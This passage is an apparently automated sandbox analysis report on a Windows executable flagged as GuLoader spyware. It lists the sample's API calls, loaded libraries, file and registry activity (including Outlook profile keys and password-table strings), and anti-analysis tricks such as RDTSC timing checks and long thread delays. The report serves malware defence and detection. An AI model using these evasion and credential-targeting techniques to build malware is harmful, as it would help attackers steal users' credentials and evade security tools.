            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E9788_2_3621E978
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36217F488_2_36217F48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621B1488_2_3621B148
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D3A88_2_3621D3A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36216FA88_2_36216FA8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621A1A88_2_3621A1A8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621E9888_2_3621E988
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621B7888_2_3621B788
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362185888_2_36218588
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D3978_2_3621D397
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621D9E88_2_3621D9E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362175E88_2_362175E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621A7E88_2_3621A7E8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621EFC88_2_3621EFC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36218BC88_2_36218BC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_3621BDC88_2_3621BDC8
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362415308_2_36241530
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36241C188_2_36241C18
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362407608_2_36240760
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362423008_2_36242300
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362400408_2_36240040
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36240E488_2_36240E48
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362415218_2_36241521
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36241C088_2_36241C08
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362407508_2_36240750
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362422F18_2_362422F1
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_362400068_2_36240006
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_36240E388_2_36240E38
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: String function: 00402DAB appears 51 times
            Source: OW1i3n5K3s.exeStatic PE information: invalid certificate
            Source: OW1i3n5K3s.exe, 00000008.00000002.2504810800.0000000032C77000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs OW1i3n5K3s.exe
            Source: OW1i3n5K3s.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/15@5/5
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403645
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_00403645 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,wsprintfW,GetFileAttributesW,DeleteFileW,SetCurrentDirectoryW,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,8_2_00403645
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_00404AF2 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404AF2
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_004021AF CoCreateInstance,1_2_004021AF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile created: C:\Users\user\AppData\Local\interdifferentiateJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeMutant created: NULL
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile created: C:\Users\user\AppData\Local\Temp\nsd77B1.tmpJump to behavior
            Source: OW1i3n5K3s.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: OW1i3n5K3s.exe, 00000008.00000002.2505212840.00000000330E2000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.00000000330F2000.00000004.00000800.00020000.00000000.sdmp, OW1i3n5K3s.exe, 00000008.00000002.2505212840.0000000033100000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: OW1i3n5K3s.exeVirustotal: Detection: 74%
            Source: OW1i3n5K3s.exeReversingLabs: Detection: 65%
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile read: C:\Users\user\Desktop\OW1i3n5K3s.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess created: C:\Users\user\Desktop\OW1i3n5K3s.exe "C:\Users\user\Desktop\OW1i3n5K3s.exe"Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: purifier.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile written: C:\Users\user\AppData\Local\interdifferentiate\Elicitate\Stabs171.iniJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: OW1i3n5K3s.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Yara detected GuLoader
            Source: Yara matchFile source: 00000008.00000002.2476092324.000000000186B000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.1342316405.00000000053BB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_6EDC1BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_6EDC1BFF
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 1_2_6EDC30C0 push eax; ret 1_2_6EDC30EE
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeCode function: 8_2_02589C30 push esp; retf 025Ah8_2_02589D55

            Persistence and Installation Behavior

            barindex
            AI detected suspicious PE digital signature
            Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple highly suspicious indicators: 1) Self-signed certificate (issuer matches subject) which is not trusted by system providers 2) Organization 'Digitoxigenin' is not a known legitimate company 3) Email domain 'Forholdstalsvalg.Sny' appears randomly generated and non-standard 4) Organizational Unit contains strange concatenated words that don't make business sense 5) Compilation timestamp (July 2023) is significantly older than certificate creation (Sept 2024), suggesting possible certificate manipulation 6) While GB location is generally lower risk, other certificate elements strongly suggest this is being used as a false front 7) Invalid signature validation further confirms certificate cannot be trusted. The combination of a self-signed certificate, suspicious organization details, and invalid signature validation strongly suggests this is a malicious attempt to appear legitimate.
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeFile created: C:\Users\user\AppData\Local\Temp\nsd854F.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Switches to a custom stack to bypass stack traces
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeAPI/Special instruction interceptor: Address: 5924383
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeAPI/Special instruction interceptor: Address: 1DD4383
            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeRDTSC instruction interceptor: First address: 58E05E6 second address: 58E05E6 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4E0948F3F4h 0x00000008 test al, dl 0x0000000a test edx, ebx 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeRDTSC instruction interceptor: First address: 1D905E6 second address: 1D905E6 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, bl 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F4E08BB4F84h 0x00000008 test al, dl 0x0000000a test edx, ebx 0x0000000c inc ebp 0x0000000d inc ebx 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeMemory allocated: 2530000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeMemory allocated: 32E80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeMemory allocated: 32C80000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599780Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599452Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598304Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598201Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 598082Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597734Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597334Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 597078Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596930Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596171Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 596062Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595953Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595843Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595734Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595621Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595515Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595406Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595296Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595187Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 595078Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594968Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594859Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594749Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594637Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594531Jump to behavior
            Source: C:\Users\user\Desktop\OW1i3n5K3s.exeThread delayed: delay time: 594421Jump to behavior
